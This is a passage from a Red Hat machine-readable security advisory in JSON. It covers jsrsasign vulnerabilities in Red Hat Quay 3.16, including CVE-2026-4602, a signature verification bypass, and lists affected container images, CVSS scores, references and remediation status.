        },
        {
          "category": "external",
          "summary": "https://gist.github.com/Kr0emer/93789fe6efe5519db9692d4ad1dad586",
          "url": "https://gist.github.com/Kr0emer/93789fe6efe5519db9692d4ad1dad586"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/commit/0710e392ec35de697ce11e4219c988ba2b5fe0eb",
          "url": "https://github.com/kjur/jsrsasign/commit/0710e392ec35de697ce11e4219c988ba2b5fe0eb"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/pull/645",
          "url": "https://github.com/kjur/jsrsasign/pull/645"
        },
        {
          "category": "external",
          "summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370941",
          "url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370941"
        }
      ],
      "release_date": "2026-03-23T05:00:13.312000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "jsrsasign: jsrsasign: Private Key Recovery via Missing Cryptographic Step in DSA Signing"
    },
    {
      "cve": "CVE-2026-4602",
      "cwe": {
        "id": "CWE-681",
        "name": "Incorrect Conversion between Numeric Types"
      },
      "discovery_date": "2026-03-23T06:01:28.729668+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2450206"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in jsrsasign. A remote attacker can exploit an incorrect conversion between numeric types by providing a negative exponent to the `modPow` function. This vulnerability can force the computation of incorrect modular inverses, which ultimately allows an attacker to bypass signature verification.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "jsrsasign: jsrsasign: Signature verification bypass via negative exponent handling",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This is an IMPORTANT flaw. The `jsrsasign` library, as used in Red Hat products such as Migration Toolkit for Virtualization and Red Hat Quay, is vulnerable to a signature verification bypass. A remote attacker could provide a specially crafted negative exponent to the `modPow` function, leading to incorrect modular inverse computations and allowing them to bypass signature verification.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4602"
        },
        {
          "category": "external",
          "summary": "RHBZ#2450206",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450206"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4602",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4602"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4602",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4602"
        },
        {
          "category": "external",
          "summary": "https://gist.github.com/Kr0emer/7ecd2be7d17419e4677315ef3758faf5",
          "url": "https://gist.github.com/Kr0emer/7ecd2be7d17419e4677315ef3758faf5"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/commit/5ea1c32bb2aa894b4bd29849839afe4f98728195",
          "url": "https://github.com/kjur/jsrsasign/commit/5ea1c32bb2aa894b4bd29849839afe4f98728195"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/pull/650",
          "url": "https://github.com/kjur/jsrsasign/pull/650"
        },
        {
          "category": "external",
          "summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15371175",
          "url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15371175"
        }
      ],
      "release_date": "2026-03-23T05:00:10.567000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
